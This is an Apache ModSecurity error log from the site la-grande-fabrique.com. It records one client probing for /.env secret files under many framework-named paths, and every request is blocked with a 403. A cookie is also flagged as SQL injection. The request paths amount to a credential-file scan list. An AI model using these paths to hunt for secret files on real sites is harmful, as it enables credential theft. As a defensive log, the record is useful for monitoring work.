[Mon May 11 14:10:02.175987 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5AAAAQ4"]
[Mon May 11 14:10:02.369726 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5QAAAQ4"]
[Mon May 11 14:10:02.370115 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5QAAAQ4"]
[Mon May 11 14:10:02.370311 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5QAAAQ4"]
[Mon May 11 14:10:02.370565 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5QAAAQ4"]
[Mon May 11 14:10:02.583107 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5gAAAQ4"]
[Mon May 11 14:10:02.583514 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5gAAAQ4"]
[Mon May 11 14:10:02.583699 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5gAAAQ4"]
[Mon May 11 14:10:02.583945 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5gAAAQ4"]
[Mon May 11 14:10:02.776650 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6AAAAQ4"]
[Mon May 11 14:10:02.777029 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6AAAAQ4"]
[Mon May 11 14:10:02.777226 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6AAAAQ4"]
[Mon May 11 14:10:02.777472 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6AAAAQ4"]
[Mon May 11 14:10:02.893555 2026] [core:error] [pid 1320674:tid 1320709] [client 52.242.216.199:21726] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:02.893596 2026] [core:error] [pid 1320674:tid 1320709] [client 52.242.216.199:21726] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:02.950775 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6gAAAQ4"]
[Mon May 11 14:10:02.951150 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6gAAAQ4"]
[Mon May 11 14:10:02.951359 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6gAAAQ4"]
[Mon May 11 14:10:02.951598 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA6gAAAQ4"]
[Mon May 11 14:10:03.134650 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7AAAAQ4"]
[Mon May 11 14:10:03.134986 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7AAAAQ4"]
[Mon May 11 14:10:03.135143 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7AAAAQ4"]
[Mon May 11 14:10:03.135374 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7AAAAQ4"]
[Mon May 11 14:10:03.331300 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7QAAAQ4"]
[Mon May 11 14:10:03.331687 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7QAAAQ4"]
[Mon May 11 14:10:03.331872 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7QAAAQ4"]
[Mon May 11 14:10:03.332281 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7QAAAQ4"]
[Mon May 11 14:10:03.567463 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7wAAAQ4"]
[Mon May 11 14:10:03.567846 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7wAAAQ4"]
[Mon May 11 14:10:03.568025 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7wAAAQ4"]
[Mon May 11 14:10:03.568300 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA7wAAAQ4"]
[Mon May 11 14:10:03.780197 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA8AAAAQ4"]
[Mon May 11 14:10:03.780641 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA8AAAAQ4"]
[Mon May 11 14:10:03.780822 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA8AAAAQ4"]
[Mon May 11 14:10:03.781058 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHHG1chVQ3tCn0m9OpA8AAAAQ4"]
[Mon May 11 14:10:04.087815 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA8gAAAQ4"]
[Mon May 11 14:10:04.088204 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA8gAAAQ4"]
